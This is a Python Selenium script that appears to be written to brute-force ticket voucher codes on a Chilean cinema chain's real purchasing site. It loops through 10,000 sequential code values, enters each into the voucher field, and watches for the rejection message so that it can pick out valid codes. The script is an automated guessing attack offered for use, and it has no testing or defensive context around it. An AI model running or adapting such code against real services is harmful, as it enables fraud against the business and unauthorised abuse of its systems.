# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.support import expected_conditions as EC


class style():
    BLACK = '\033[30m'
    RED = '\033[31m'
    GREEN = '\033[32m'
    YELLOW = '\033[33m'
    BLUE = '\033[34m'
    MAGENTA = '\033[35m'
    CYAN = '\033[36m'
    WHITE = '\033[37m'
    UNDERLINE = '\033[4m'
    RESET = '\033[0m'

print(style.BLUE)
print("Bienvenido al testing de codigos de cinehoyts")
print(style.RESET)

f = open("codigos_probados", "w")

link = "https://inetvis.cinehoyts.cl/Compra/visSelectTickets.aspx?cinemacode=1091&txtSessionId=4334&distributor=&originalTitle=MINIONS%202:%20NACE%20UN%20VILLANO&language=&genre=&rating=TE&director=Kyle%20Balda&protagonist=undefined&AspxAutoDetectCookieSupport=1"
first_code = 890015711930


options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
driver = webdriver.Chrome(options=options)

for code in range(first_code,first_code+10000):
    print(code)

    try:
        driver.get("https://inetvis.cinehoyts.cl/Compra/visSelectTickets.aspx?cinemacode=712&txtSessionId=87473&distributor=Sin%20datos&originalTitle=THOR:%20AMOR%20Y%20TRUENO&language=&genre=Acci%C3%B3n&rating=TE7+&director=Taika%20Waititi&protagonist=Chris%20%20Hemsworth,%20Christian%20%20Bale,%20Natalie%20Portman")

        driver.set_window_size(1387, 816)
        driver.execute_script("window.scrollTo(200, 400);")
        time.sleep(2)
        driver.find_element(By.ID, "txtVoucherEntry").click()
        driver.find_element(By.ID, "txtVoucherEntry").send_keys(code)
        driver.find_element(By.ID, "ibtnAddToOrder").click()

        try:
            invalid = WebDriverWait(driver, 3).until(EC.element_to_be_clickable((By.XPATH, "//*[contains(text(), 'Lo sentimos')]")))
        except:
            print(f'fallo el codigo {code}')
    except Exception as e: 
        print(e)

    print(invalid)